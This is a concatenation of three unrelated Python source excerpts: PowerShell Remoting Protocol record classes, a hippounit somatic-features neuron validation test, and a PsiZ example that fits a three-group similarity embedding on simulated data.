"System.Int32, mscorlib, Version=4.0.0.0, "
"Culture=neutral, PublicKeyToken=b77a5c561934e089]]",
"System.Object"
]
)),
)
self.exception = kwargs.get('exception')
self.target_info = kwargs.get('target_info')
self.invocation = kwargs.get('invocation')
self.fq_error = kwargs.get('fq_error')
self.category = kwargs.get('category')
self.activity = kwargs.get('activity')
self.reason = kwargs.get('reason')
self.target_name = kwargs.get('target_name')
self.target_type = kwargs.get('target_type')
self.message = kwargs.get('message')
self.details_message = kwargs.get('details_message')
self.action = kwargs.get('action')
self.pipeline_iteration_info = kwargs.get('pipeline_iteration_info')
self.invocation_name = kwargs.get('invocation_name')
self.invocation_bound_parameters = \
kwargs.get('invocation_bound_parameters')
self.invocation_unbound_arguments = \
kwargs.get('invocation_unbound_arguments')
self.invocation_command_origin = \
kwargs.get('invocation_command_origin')
self.invocation_expecting_input = \
kwargs.get('invocation_expecting_input')
self.invocation_line = kwargs.get('invocation_line')
self.invocation_offset_in_line = \
kwargs.get('invocation_offset_in_line')
self.invocation_position_message = \
kwargs.get('invocation_position_message')
self.invocation_script_name = kwargs.get('invocation_script_name')
self.invocation_script_line_number = \
kwargs.get('invocation_script_line_number')
self.invocation_history_id = kwargs.get('invocation_history_id')
self.invocation_pipeline_length = \
kwargs.get('invocation_pipeline_length')
self.invocation_pipeline_position = \
kwargs.get('invocation_pipeline_position')
self.invocation_pipeline_iteration_info = \
kwargs.get('invocation_pipeline_iteration_info')
self.command_type = kwargs.get('command_type')
self.command_definition = kwargs.get('command_definition')
self.command_name = kwargs.get('command_name')
self.command_visibility = kwargs.get('command_visibility')
self.extended_info_present = self.invocation is not None
class InformationalRecord(ComplexObject):
def __init__(self, **kwargs):
"""
[MS-PSRP] 2.2.3.16 InformationalRecord (Debug/Warning/Verbose)
https://msdn.microsoft.com/en-us/library/dd305072.aspx
"""
super(InformationalRecord, self).__init__()
self._types = [
"System.Management.Automation.InformationRecord",
"System.Object"
]
self._extended_properties = (
('message', ObjectMeta("S", name="InformationalRecord_Message")),
('invocation', ObjectMeta(
"B", name="InformationalRecord_SerializeInvocationInfo"
)),
('invocation_name', ObjectMeta(
"S",
optional=True,
name="InvocationInfo_InvocationName"
)),
('invocation_bound_parameters', DictionaryMeta(
name="InvocationInfo_BoundParameters",
optional=True,
dict_key_meta=ObjectMeta("S"),
dict_types=[
"System.Management.Automation.PSBoundParametersDictionary",
"System.Collections.Generic.Dictionary`2[[System.String, "
"mscorlib, Version=4.0.0.0, Culture=neutral, "
"PublicKeyToken=b77a5c561934e089],"
"[System.Object, mscorlib, Version=4.0.0.0, "
"Culture=neutral, PublicKeyToken=b77a5c561934e089]]",
"System.Object"
]
)),
('invocation_unbound_arguments', ListMeta(
name="InvocationInfo_UnboundArguments",
optional=True,
list_types=[
"System.Collections.Generic.List`1[["
"System.Object, mscorlib, Version=4.0.0.0, "
"Culture=neutral, PublicKeyToken=b77a5c561934e089]]",
"System.Object"
]
)),
('invocation_command_origin', ObjectMeta(
"Obj",
name="InvocationInfo_CommandOrigin",
optional=True,
object=CommandOrigin
)),
('invocation_expecting_input', ObjectMeta(
"B",
name="InvocationInfo_ExpectingInput",
optional=True
)),
('invocation_line', ObjectMeta(
"S",
name="InvocationInfo_Line",
optional=True
)),
('invocation_offset_in_line', ObjectMeta(
"I32",
name="InvocationInfo_OffsetInLine",
optional=True
)),
('invocation_position_message', ObjectMeta(
"S",
name="InvocationInfo_PositionMessage",
optional=True
)),
('invocation_script_name', ObjectMeta(
"S",
name="InvocationInfo_ScriptName",
optional=True
)),
('invocation_script_line_number', ObjectMeta(
"I32",
name="InvocationInfo_ScriptLineNumber",
optional=True
)),
('invocation_history_id', ObjectMeta(
"I64",
name="InvocationInfo_HistoryId",
optional=True
)),
('invocation_pipeline_length', ObjectMeta(
"I32",
name="InvocationInfo_PipelineLength",
optional=True
)),
('invocation_pipeline_position', ObjectMeta(
"I32",
name="InvocationInfo_PipelinePosition",
optional=True
)),
('invocation_pipeline_iteration_info', ListMeta(
name="InvocationInfo_PipelineIterationInfo",
optional=True,
list_value_meta=ObjectMeta("I32"),
list_types=["System.In32[]", "System.Array", "System.Object"]
)),
('command_type', ObjectMeta(
"Obj",
name="CommandInfo_CommandType",
object=CommandType,
optional=True,
)),
('command_definition', ObjectMeta(
"S",
name="CommandInfo_Definition",
optional=True,
)),
('command_name', ObjectMeta(
"S",
name="CommandInfo_Name",
optional=True
)),
('command_visibility', ObjectMeta(
"Obj",
name="CommandInfo_Visibility",
object=SessionStateEntryVisibility,
optional=True
)),
('pipeline_iteration_info', ListMeta(
name="InformationalRecord_PipelineIterationInfo",
optional=True,
list_value_meta=ObjectMeta("I32"),
list_types=[
"System.Collections.ObjectModel.ReadOnlyCollection`1[["
"System.Int32, mscorlib, Version=4.0.0.0, "
"Culture=neutral, PublicKeyToken=b77a5c561934e089]]",
"System.Object"
]
))
)
self.message = kwargs.get('message')
self.pipeline_iteration_info = kwargs.get('pipeline_iteration_info')
self.invocation_name = kwargs.get('invocation_name')
self.invocation_bound_parameters = \
kwargs.get('invocation_bound_parameters')
self.invocation_unbound_arguments = \
kwargs.get('invocation_unbound_arguments')
self.invocation_command_origin = \
kwargs.get('invocation_command_origin')
self.invocation_expecting_input = \
kwargs.get('invocation_expecting_input')
self.invocation_line = kwargs.get('invocation_line')
self.invocation_offset_in_line = \
kwargs.get('invocation_offset_in_line')
self.invocation_position_message = \
kwargs.get('invocation_position_message')
self.invocation_script_name = kwargs.get('invocation_script_name')
self.invocation_script_line_number = \
kwargs.get('invocation_script_line_number')
self.invocation_history_id = kwargs.get('invocation_history_id')
self.invocation_pipeline_length = \
kwargs.get('invocation_pipeline_length')
self.invocation_pipeline_position = \
kwargs.get('invocation_pipeline_position')
self.invocation_pipeline_iteration_info = \
kwargs.get('invocation_pipeline_iteration_info')
self.command_type = kwargs.get('command_type')
self.command_definition = kwargs.get('command_definition')
self.command_name = kwargs.get('command_name')
self.command_visibility = kwargs.get('command_visibility')
self.invocation = False
class HostMethodIdentifier(Enum):
def __init__(self, **kwargs):
"""
[MS-PSRP] 2.2.3.17 Host Method Identifier
https://msdn.microsoft.com/en-us/library/dd306624.aspx
Represents methods to be executed on a host.
:param value: The method identifier to | |
from __future__ import print_function
from future import standard_library
standard_library.install_aliases()
#from builtins import str
from builtins import range
from quantities.quantity import Quantity
import sciunit
from sciunit import Test,Score
try:
from sciunit import ObservationError
except:
from sciunit.errors import ObservationError
import hippounit.capabilities as cap
from sciunit.utils import assert_dimensionless# Converters.
from sciunit.scores import BooleanScore,ZScore # Scores.
import pkg_resources
try:
import numpy
except:
print("NumPy not loaded.")
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
#from neuron import h
import collections
import efel
import os
import multiprocessing
import multiprocessing.pool
import functools
import math
from scipy import stats
import json
from hippounit import plottools
import collections
try:
import pickle as pickle
except:
import pickle
import gzip
try:
import copyreg
except:
import copyreg
from types import MethodType
from quantities import mV, nA, ms, V, s
from hippounit import scores
def _pickle_method(method):
func_name = method.__func__.__name__
obj = method.__self__
cls = method.__self__.__class__
return _unpickle_method, (func_name, obj, cls)
def _unpickle_method(func_name, obj, cls):
for cls in cls.mro():
try:
func = cls.__dict__[func_name]
except KeyError:
pass
else:
break
return func.__get__(obj, cls)
try:
copy_reg.pickle(MethodType, _pickle_method, _unpickle_method)
except:
copyreg.pickle(MethodType, _pickle_method, _unpickle_method)
class SomaticFeaturesTest(Test):
"""
Tests some somatic features under current injection of increasing amplitudes.
Parameters
----------
config : dict
dictionary loaded from a JSON file, containing the parameters of the simulation
observation : dict
dictionary loaded from a JSON file, containing the experimental mean and std values for the features to be tested
force_run : boolean
If True and the pickle files containing the model's response to the simulation exists, the simulation won't be run again, traces are loaded from the pickle file
base_directory : str
Results will be saved here
show_plot : boolean
If False, plots are not displayed but still saved
save_all : boolean
If False, only the JSON files containing the absolute feature values, the feature error scores and the final scores, and a log file are saved, but the figures and pickle files are not.
specify_data_set : str
When set to a string, output will be saved into subdirectory (within the model_name subderotory) named like this. This makes it possible to run the validation on a specific model, against different data sets, and save the results separately.
"""
def __init__(self,
observation = {} ,
config = {},
name="Somatic features test" ,
force_run=False,
base_directory=None,
show_plot=True,
save_all = True,
specify_data_set = ''):
Test.__init__(self,observation,name)
self.required_capabilities += (cap.ReceivesSquareCurrent_ProvidesResponse,)
self.force_run = force_run
self.show_plot = show_plot
self.save_all = save_all
self.config = config
self.base_directory = base_directory
self.path_temp_data = None #added later, because model name is needed
self.path_figs = None
self.path_results = None
self.npool = multiprocessing.cpu_count() - 1
self.logFile = None
self.test_log_filename = 'test_log.txt'
self.specify_data_set = specify_data_set #this is added to the name of the directory (somaticfeat), so tests runs using different data sets can be saved into different directories
plt.close('all') #needed to avoid overlapping of saved images when the test is run on multiple models in a for loop
#with open('./stimfeat/PC_newfeat_No14112401_15012303-m990803_stimfeat.json') as f:
#self.config = json.load(f, object_pairs_hook=collections.OrderedDict)
description = "Tests some somatic features under current injection of increasing amplitudes."
score_type = scores.ZScore_somaticSpiking
def create_stimuli_list(self):
#with open('./stimfeat/PC_newfeat_No14112401_15012303-m990803_stimfeat.json') as f:
#config = json.load(f, object_pairs_hook=collections.OrderedDict)
stimulus_list=[]
stimuli_list=[]
stimuli_names = []
stimuli_names=list(self.config['stimuli'].keys())
for i in range (0, len(stimuli_names)):
stimulus_list.append(stimuli_names[i])
stimulus_list.append(self.config['stimuli'][stimuli_names[i]]['Amplitude'])
stimulus_list.append(self.config['stimuli'][stimuli_names[i]]['Delay'])
stimulus_list.append(self.config['stimuli'][stimuli_names[i]]['Duration'])
stimulus_list.append(self.config['stimuli'][stimuli_names[i]]['StimSectionName'])
stimulus_list.append(self.config['stimuli'][stimuli_names[i]]['StimLocationX'])
stimulus_list.append(self.config['stimuli'][stimuli_names[i]]['Type'])
stimulus_list.append(self.config['stimuli'][stimuli_names[i]]['RecSectionName'])
stimulus_list.append(self.config['stimuli'][stimuli_names[i]]['RecLocationX'])
stimuli_list.append(stimulus_list)
stimulus_list=[]
return stimuli_list
def create_features_list(self, observation):
feature_list=[]
features_list=[]
features_names=(list(observation.keys()))
for i in range (0, len(features_names)):
feature_list.append(features_names[i])
feature_list.append(observation[features_names[i]]['Std'])
feature_list.append(observation[features_names[i]]['Mean'])
feature_list.append(observation[features_names[i]]['Stimulus'])
feature_list.append(observation[features_names[i]]['Type'])
features_list.append(feature_list)
feature_list=[]
return features_names, features_list
def run_stim(self, model, stimuli_list):
stimulus_name, amplitude, delay, duration, stim_section_name, stim_location_x, stim_type, rec_section_name, rec_location_x = stimuli_list
traces_result={}
if self.specify_data_set != '':
specify_data_set = '_' + self.specify_data_set
else:
specify_data_set = self.specify_data_set
if self.base_directory:
self.path_temp_data = self.base_directory + 'temp_data/' + 'somaticfeat' + specify_data_set + '/' + model.name + '/'
else:
self.path_temp_data = model.base_directory + 'temp_data/' + 'somaticfeat' + specify_data_set + '/'
try:
if not os.path.exists(self.path_temp_data) and self.save_all:
os.makedirs(self.path_temp_data)
except OSError as e:
if e.errno != 17:
raise
pass
if stim_type == "SquarePulse":
file_name = self.path_temp_data + stimulus_name + '.p'
if self.force_run or (os.path.isfile(file_name) is False):
t, v = model.get_vm(float(amplitude), float(delay), float(duration), stim_section_name, stim_location_x, rec_section_name, rec_location_x)
traces_result[stimulus_name]=[t,v]
if self.save_all:
pickle.dump(traces_result, gzip.GzipFile(file_name, "wb"))
else:
traces_result = pickle.load(gzip.GzipFile(file_name, "rb"))
else:
traces_result=None
return traces_result
def analyse_traces(self, stimuli_list, traces_results, features_list):
feature_name, target_sd, target_mean, stimulus, feature_type = features_list
target_sd=float(target_sd)
target_mean=float(target_mean)
feature_result={}
trace = {}
for i in range (0, len(traces_results)):
for key, value in traces_results[i].items():
stim_name=key
if stim_name == stimulus:
trace['T'] = traces_results[i][stim_name][0]
trace['V'] = traces_results[i][stim_name][1]
for i in range (0, len(stimuli_list)):
if stimuli_list[i][0]==stimulus:
trace['stim_start'] = [float(stimuli_list[i][2])]
trace['stim_end'] = [float(stimuli_list[i][2])+float(stimuli_list[i][3])]
traces = [trace]
#print traces
efel_results = efel.getFeatureValues(traces,[feature_type])
feature_values=efel_results[0][feature_type]
if feature_values is not None and feature_values.size != 0:
if (feature_type == 'AP_rise_time' or feature_type == 'AP_amplitude' or feature_type == 'AP_duration_half_width' or feature_type == 'AP_begin_voltage'
or feature_type == 'AP_rise_rate' or feature_type == 'fast_AHP' or feature_type == 'AP_begin_time' or feature_type == 'AP_begin_width' or feature_type == 'AP_duration'
or feature_type == 'AP_duration_change' or feature_type == 'AP_duration_half_width_change' or feature_type == 'fast_AHP_change' or feature_type == 'AP_rise_rate_change' or feature_type == 'AP_width'):
"""
In case of features that are AP_begin_time/AP_begin_index, the 1st element of the resulting vector, which corresponds to AP1, is ignored
This is because the AP_begin_time/AP_begin_index feature often detects the start of the stimuli instead of the actual beginning of AP1
"""
feature_mean=numpy.mean(feature_values[1:])
feature_sd=numpy.std(feature_values[1:])
else:
feature_mean=numpy.mean(feature_values)
feature_sd=numpy.std(feature_values)
else:
feature_mean = float('nan')
feature_sd = float('nan')
#feature_mean=numpy.mean(feature_values)
#feature_sd=numpy.std(feature_values)
feature_result={feature_name:{'feature values': feature_values,
'feature mean': feature_mean,
'feature sd': feature_sd}}
return feature_result
def create_figs(self, model, traces_results, features_names, feature_results_dict, observation):
if self.specify_data_set != '':
specify_data_set = '_' + self.specify_data_set
else:
specify_data_set = self.specify_data_set
if self.base_directory:
self.path_figs = self.base_directory + 'figs/' + 'somaticfeat' + specify_data_set + '/' + model.name + '/'
else:
self.path_figs = model.base_directory + 'figs/' + 'somaticfeat' + specify_data_set + '/'
try:
if not os.path.exists(self.path_figs) and self.save_all:
os.makedirs(self.path_figs)
except OSError as e:
if e.errno != 17:
raise
pass
if self.save_all:
print("The figures are saved in the directory: ", self.path_figs)
plt.figure(1)
#key=sorted()
for i in range (0, len(traces_results)):
for key, value in traces_results[i].items():
plt.plot(traces_results[i][key][0], traces_results[i][key][1], label=key)
plt.legend(loc=2)
if self.save_all:
plt.savefig(self.path_figs + 'traces' + '.pdf', dpi=600,)
columns = 2
width_ratios=[1]*columns
frames = len(traces_results)
rows = int(numpy.ceil(frames/float(columns)))
height_ratios=[1]*rows
#axs=[]
fig = plt.figure(figsize = (210/25.4, 297/25.4))
gs = matplotlib.gridspec.GridSpec(rows, columns, height_ratios=height_ratios, width_ratios=width_ratios)
gs.update(top=0.97, bottom=0.04, left=0.07, right=0.97, hspace=0.75, wspace=0.3)
#fig, axes = plt.subplots(nrows=int(round(len(traces_results)/2.0)), ncols=2)
#fig.tight_layout()
for i in range (0, len(traces_results)):
for key, value in traces_results[i].items():
#plt.subplot(round(len(traces_results)/2.0),2,i+1)
plt.subplot(gs[i])
#axs.append(fig.add_subplot(gs[i]))
plt.plot(traces_results[i][key][0], traces_results[i][key][1])
plt.title(key)
plt.xlabel("ms")
plt.ylabel("mV")
minx = float(self.config['stimuli'][key]['Delay']) - 200
maxx = float(self.config['stimuli'][key]['Delay']) + float(self.config['stimuli'][key]['Duration']) + 200
plt.xlim(minx, maxx)
#plt.tick_params(labelsize=15)
#gs.tight_layout(fig)
#fig = plt.gcf()
#fig.set_size_inches(12, 10)
if self.save_all:
plt.savefig(self.path_figs + 'traces_subplots' + '.pdf', dpi=600, bbox_inches='tight')
axs = plottools.tiled_figure("absolute features", figs={}, frames=1, columns=1, orientation='page',
height_ratios=None, top=0.97, bottom=0.05, left=0.25, right=0.97, hspace=0.1, wspace=0.2)
plt.gcf().set_size_inches(210/25.4, 297/25.4*2 )
label_added = False
for i in range (len(features_names)):
feature_name=features_names[i]
y=i
if not label_added:
axs[0].errorbar(feature_results_dict[feature_name]['feature mean'], y, xerr=feature_results_dict[feature_name]['feature sd'], marker='o', color='blue', label = model.name)
axs[0].errorbar(float(observation[feature_name]['Mean']), y, xerr=float(observation[feature_name]['Std']), marker='o', color='red', label = 'experiment')
label_added = True
else:
axs[0].errorbar(feature_results_dict[feature_name]['feature mean'], y, xerr=feature_results_dict[feature_name]['feature sd'], marker='o', color='blue')
axs[0].errorbar(float(observation[feature_name]['Mean']), y, xerr=float(observation[feature_name]['Std']), marker='o', color='red')
axs[0].yaxis.set_ticks(list(range(len(features_names))))
axs[0].set_yticklabels(features_names)
axs[0].set_ylim(-1, len(features_names))
axs[0].set_title('Absolute Features')
lgd=plt.legend(bbox_to_anchor=(1.0, 1.0), loc = 'upper left')
if self.save_all:
plt.savefig(self.path_figs + 'absolute_features' + '.pdf', dpi=600, bbox_extra_artists=(lgd,), bbox_inches='tight')
def generate_prediction(self, model, verbose=False):
"""Implementation of sciunit.Test.generate_prediction."""
efel.reset()
self.observation = collections.OrderedDict(sorted(self.observation.items()))
global model_name_soma
model_name_soma = model.name
pool = multiprocessing.Pool(self.npool, maxtasksperchild=1)
stimuli_list=self.create_stimuli_list()
run_stim_ = functools.partial(self.run_stim, model)
traces_results = pool.map(run_stim_, stimuli_list, chunksize=1)
#traces_results = traces_result.get()
pool.terminate()
pool.join()
del pool
pool2 = multiprocessing.Pool(self.npool, maxtasksperchild=1)
features_names, features_list = self.create_features_list(self.observation)
analyse_traces_ = functools.partial(self.analyse_traces, stimuli_list, traces_results)
feature_results = pool2.map(analyse_traces_, features_list, chunksize=1)
#feature_results = feature_result.get()
pool2.terminate()
pool2.join()
del pool2
feature_results_dict={}
for i in range (0,len(feature_results)):
feature_results_dict.update(feature_results[i]) #concatenate dictionaries
if self.specify_data_set != '':
specify_data_set = '_' + self.specify_data_set
else:
specify_data_set = self.specify_data_set
if self.base_directory:
self.path_results = self.base_directory + 'results/' + 'somaticfeat' + specify_data_set + '/' + model.name + '/'
else:
self.path_results = model.base_directory + 'results/' + 'somaticfeat' + specify_data_set + '/'
try:
if not os.path.exists(self.path_results):
os.makedirs(self.path_results)
except OSError as e:
if e.errno != 17:
raise
pass
file_name=self.path_results+'soma_features.p'
SomaFeaturesDict={}
SomaFeaturesDict['traces_results']=traces_results
SomaFeaturesDict['features_names']=features_names
SomaFeaturesDict['feature_results_dict']=feature_results_dict
SomaFeaturesDict['observation']=self.observation
if self.save_all:
pickle.dump(SomaFeaturesDict, gzip.GzipFile(file_name, "wb"))
plt.close('all') #needed to avoid overlapping of saved images when the test is run on multiple models in a for loop
self.create_figs(model, traces_results, features_names, feature_results_dict, self.observation)
#prediction = feature_results_dict
soma_features={}
needed_keys = { 'feature mean', 'feature sd'}
for i in range(len(SomaFeaturesDict['features_names'])):
feature_name = SomaFeaturesDict['features_names'][i]
soma_features[feature_name] = { key:value for key,value | |
<gh_stars>0
# -*- coding: utf-8 -*-
# Copyright 2020 The PsiZ Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Example that infers a shared embedding for three groups.
Fake data is generated from a ground truth model for three different
groups. In this example, these groups represent groups of agents with
varying levels of skill: novices, intermediates, and experts. Each group
has a different set of attention weights. An embedding model is
inferred from the simulated data and compared to the ground truth
model.
Results are saved in the directory specified by `fp_example`. By
default, a `psiz_examples` directory is created in your home directory.
Example output:
Attention weights:
Novice | [0.89 0.81 0.13 0.11]
Intermediate | [0.54 0.44 0.53 0.58]
Expert | [0.06 0.08 0.80 0.92]
Model Comparison (R^2)
================================
True | Inferred
| Novice Interm Expert
--------+-----------------------
Novice | 0.97 0.59 0.12
Interm | 0.64 0.98 0.60
Expert | 0.14 0.58 0.96
"""
import os
os.environ["TF_CPP_MIN_LOG_LEVEL"] = "2" # noqa
from pathlib import Path
import shutil
import imageio
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
from scipy.stats import pearsonr
import tensorflow as tf
import tensorflow_probability as tfp
import psiz
# Uncomment the following line to force eager execution.
# tf.config.run_functions_eagerly(True)
# Uncomment and edit the following to control GPU visibility.
# os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
# os.environ["CUDA_VISIBLE_DEVICES"] = "0"
def main():
"""Run script."""
# Settings.
fp_example = Path.home() / Path('psiz_examples', 'rank', 'vi_3g')
fp_board = fp_example / Path('logs', 'fit')
n_stimuli = 30
n_dim = 4
n_group = 3
n_trial = 2000
epochs = 1000
batch_size = 128
n_frame = 1 # Set to 4 to observe convergence behavior.
# Directory preparation.
fp_example.mkdir(parents=True, exist_ok=True)
# Remove existing TensorBoard logs.
if fp_board.exists():
shutil.rmtree(fp_board)
# Plot settings.
small_size = 6
medium_size = 8
large_size = 10
plt.rc('font', size=small_size) # controls default text sizes
plt.rc('axes', titlesize=medium_size)
plt.rc('axes', labelsize=small_size)
plt.rc('xtick', labelsize=small_size)
plt.rc('ytick', labelsize=small_size)
plt.rc('legend', fontsize=small_size)
plt.rc('figure', titlesize=large_size)
model_true = ground_truth(n_stimuli, n_dim, n_group)
# Compute ground truth similarity matrices.
simmat_truth = (
model_similarity(model_true, groups=[0]),
model_similarity(model_true, groups=[1]),
model_similarity(model_true, groups=[2])
)
# Generate a random docket of trials to show each group.
generator = psiz.trials.RandomRank(
n_stimuli, n_reference=8, n_select=2
)
docket = generator.generate(n_trial)
# Create virtual agents for each group.
agent_novice = psiz.agents.RankAgent(model_true, groups=[0])
agent_interm = psiz.agents.RankAgent(model_true, groups=[1])
agent_expert = psiz.agents.RankAgent(model_true, groups=[2])
# Simulate similarity judgments for each group.
obs_novice = agent_novice.simulate(docket)
obs_interm = agent_interm.simulate(docket)
obs_expert = agent_expert.simulate(docket)
obs = psiz.trials.stack((obs_novice, obs_interm, obs_expert))
# Partition observations into 80% train, 10% validation and 10% test set.
obs_train, obs_val, obs_test = psiz.utils.standard_split(obs)
# Convert observations to TF dataset.
ds_obs_val = obs_val.as_dataset().batch(
batch_size, drop_remainder=False
)
ds_obs_test = obs_test.as_dataset().batch(
batch_size, drop_remainder=False
)
compile_kwargs = {
'loss': tf.keras.losses.CategoricalCrossentropy(),
'optimizer': tf.keras.optimizers.Adam(lr=.001),
'weighted_metrics': [
tf.keras.metrics.CategoricalCrossentropy(name='cce')
]
}
# Infer independent models with increasing amounts of data.
if n_frame == 1:
n_obs = np.array([obs_train.n_trial], dtype=int)
else:
n_obs = np.round(
np.linspace(15, obs_train.n_trial, n_frame)
).astype(np.int64)
r2 = np.empty([n_frame, n_group, n_group]) * np.nan
train_loss = np.empty((n_frame)) * np.nan
val_loss = np.empty((n_frame)) * np.nan
test_loss = np.empty((n_frame)) * np.nan
for i_frame in range(n_frame):
include_idx = np.arange(0, n_obs[i_frame])
obs_round_train = obs_train.subset(include_idx)
ds_obs_round_train = obs_round_train.as_dataset().shuffle(
buffer_size=obs_round_train.n_trial, reshuffle_each_iteration=True
).batch(batch_size, drop_remainder=False)
print(
'\n Frame {0} ({1} obs)'.format(i_frame, obs_round_train.n_trial)
)
# Define model.
kl_weight = 1. / obs_round_train.n_trial
model_inferred = build_model(n_stimuli, n_dim, n_group, kl_weight)
# Define callbacks.
fp_board_frame = fp_board / Path('frame_{0}'.format(i_frame))
cb_board = psiz.keras.callbacks.TensorBoardRe(
log_dir=fp_board_frame, histogram_freq=0,
write_graph=False, write_images=False, update_freq='epoch',
profile_batch=0, embeddings_freq=0, embeddings_metadata=None
)
cb_early = psiz.keras.callbacks.EarlyStoppingRe(
'loss', patience=10, mode='min', restore_best_weights=False,
verbose=1
)
callbacks = [cb_board, cb_early]
# Infer model.
model_inferred.compile(**compile_kwargs)
history = model_inferred.fit(
ds_obs_round_train, validation_data=ds_obs_val, epochs=epochs,
callbacks=callbacks, verbose=0
)
train_loss[i_frame] = history.history['loss'][-1]
val_loss[i_frame] = history.history['val_loss'][-1]
tf.keras.backend.clear_session()
model_inferred.n_sample = 100
model_inferred.compile(**compile_kwargs)
test_metrics = model_inferred.evaluate(
ds_obs_test, verbose=0, return_dict=True
)
test_loss[i_frame] = test_metrics['loss']
# Compare the inferred model with ground truth by comparing the
# similarity matrices implied by each model.
simmat_inferred = (
model_similarity(model_inferred, groups=[0], n_sample=100),
model_similarity(model_inferred, groups=[1], n_sample=100),
model_similarity(model_inferred, groups=[2], n_sample=100)
)
for i_truth in range(n_group):
for j_infer in range(n_group):
rho, _ = pearsonr(
simmat_truth[i_truth], simmat_inferred[j_infer]
)
r2[i_frame, i_truth, j_infer] = rho**2
# Display attention weights.
attention_weight = tf.stack(
[
model_inferred.kernel.subnets[0].distance.w.mode(),
model_inferred.kernel.subnets[1].distance.w.mode(),
model_inferred.kernel.subnets[2].distance.w.mode()
],
axis=0
).numpy()
# Permute inferred dimensions to best match ground truth.
idx_sorted = np.argsort(-attention_weight[0, :])
attention_weight = attention_weight[:, idx_sorted]
group_labels = ["Novice", "Intermediate", "Expert"]
print("\n Attention weights:")
for i_group in range(n_group):
print(" {0:>12} | {1}".format(
group_labels[i_group],
np.array2string(
attention_weight[i_group, :],
formatter={'float_kind': lambda x: "%.2f" % x})
)
)
# Display comparison results. A good inferred model will have a high
# R^2 value on the diagonal elements (max is 1) and relatively low R^2
# values on the off-diagonal elements.
print('\n Model Comparison (R^2)')
print(' ================================')
print(' True | Inferred')
print(' | Novice Interm Expert')
print(' --------+-----------------------')
print(' Novice | {0: >6.2f} {1: >6.2f} {2: >6.2f}'.format(
r2[i_frame, 0, 0], r2[i_frame, 0, 1], r2[i_frame, 0, 2]))
print(' Interm | {0: >6.2f} {1: >6.2f} {2: >6.2f}'.format(
r2[i_frame, 1, 0], r2[i_frame, 1, 1], r2[i_frame, 1, 2]))
print(' Expert | {0: >6.2f} {1: >6.2f} {2: >6.2f}'.format(
r2[i_frame, 2, 0], r2[i_frame, 2, 1], r2[i_frame, 2, 2]))
print('\n')
# Create and save visual frame.
fig0 = plt.figure(figsize=(12, 5), dpi=200)
plot_frame(
fig0, n_obs, train_loss, val_loss, test_loss, r2, model_true,
model_inferred, idx_sorted, i_frame
)
fname = fp_example / Path('frame_{0}.tiff'.format(i_frame))
plt.savefig(
os.fspath(fname), format='tiff', bbox_inches="tight", dpi=300
)
# Create animation.
if n_frame > 1:
frames = []
for i_frame in range(n_frame):
fname = fp_example / Path('frame_{0}.tiff'.format(i_frame))
frames.append(imageio.imread(fname))
imageio.mimwrite(fp_example / Path('evolution.gif'), frames, fps=1)
def ground_truth(n_stimuli, n_dim, n_group):
"""Return a ground truth embedding."""
stimuli = tf.keras.layers.Embedding(
n_stimuli+1, n_dim, mask_zero=True,
embeddings_initializer=tf.keras.initializers.RandomNormal(
stddev=.17, seed=58
)
)
shared_similarity = psiz.keras.layers.ExponentialSimilarity(
trainable=False,
beta_initializer=tf.keras.initializers.Constant(10.),
tau_initializer=tf.keras.initializers.Constant(1.),
gamma_initializer=tf.keras.initializers.Constant(0.)
)
# Define group-specific kernels.
kernel_0 = psiz.keras.layers.DistanceBased(
distance=psiz.keras.layers.Minkowski(
rho_trainable=False,
rho_initializer=tf.keras.initializers.Constant(2.),
w_initializer=tf.keras.initializers.Constant(
[1.8, 1.8, .2, .2]
),
w_constraint=psiz.keras.constraints.NonNegNorm(
scale=n_dim, p=1.
),
),
similarity=shared_similarity
)
kernel_1 = psiz.keras.layers.DistanceBased(
distance=psiz.keras.layers.Minkowski(
rho_trainable=False,
rho_initializer=tf.keras.initializers.Constant(2.),
w_initializer=tf.keras.initializers.Constant(
[1., 1., 1., 1.]
),
w_constraint=psiz.keras.constraints.NonNegNorm(
scale=n_dim, p=1.
),
),
similarity=shared_similarity
)
kernel_2 = psiz.keras.layers.DistanceBased(
distance=psiz.keras.layers.Minkowski(
rho_trainable=False,
rho_initializer=tf.keras.initializers.Constant(2.),
w_initializer=tf.keras.initializers.Constant(
[.2, .2, 1.8, 1.8]
),
w_constraint=psiz.keras.constraints.NonNegNorm(
scale=n_dim, p=1.
),
),
similarity=shared_similarity
)
kernel_group = psiz.keras.layers.GateMulti(
subnets=[kernel_0, kernel_1, kernel_2], group_col=0
)
model = psiz.keras.models.Rank(
stimuli=stimuli, kernel=kernel_group, use_group_kernel=True
)
return model
def build_model(n_stimuli, n_dim, n_group, kl_weight):
"""Build model.
Arguments:
n_stimuli: Integer indicating the number of stimuli in the
embedding.
n_dim: Integer indicating the dimensionality of the embedding.
n_group: Integer indicating the number of groups.
kl_weight: Float indicating the KL weight for variational
inference.
Returns:
model: A TensorFlow Keras model.
"""
prior_scale = .2
embedding_posterior = psiz.keras.layers.EmbeddingNormalDiag(
n_stimuli+1, n_dim, mask_zero=True,
scale_initializer=tf.keras.initializers.Constant(
tfp.math.softplus_inverse(prior_scale).numpy()
)
)
embedding_prior = psiz.keras.layers.EmbeddingShared(
n_stimuli+1, n_dim, mask_zero=True,
embedding=psiz.keras.layers.EmbeddingNormalDiag(
1, 1,
loc_initializer=tf.keras.initializers.Constant(0.),
scale_initializer=tf.keras.initializers.Constant(
tfp.math.softplus_inverse(prior_scale).numpy()
),
loc_trainable=False
)
)
stimuli = psiz.keras.layers.EmbeddingVariational(
posterior=embedding_posterior, prior=embedding_prior,
kl_weight=kl_weight, kl_n_sample=30
)
shared_similarity = psiz.keras.layers.ExponentialSimilarity(
beta_initializer=tf.keras.initializers.Constant(10.),
tau_initializer=tf.keras.initializers.Constant(1.),
gamma_initializer=tf.keras.initializers.Constant(0.),
trainable=False
)
# Define group-specific kernels.
kernel_0 = build_vi_kernel(shared_similarity, n_dim, kl_weight)
kernel_1 = build_vi_kernel(shared_similarity, n_dim, kl_weight)
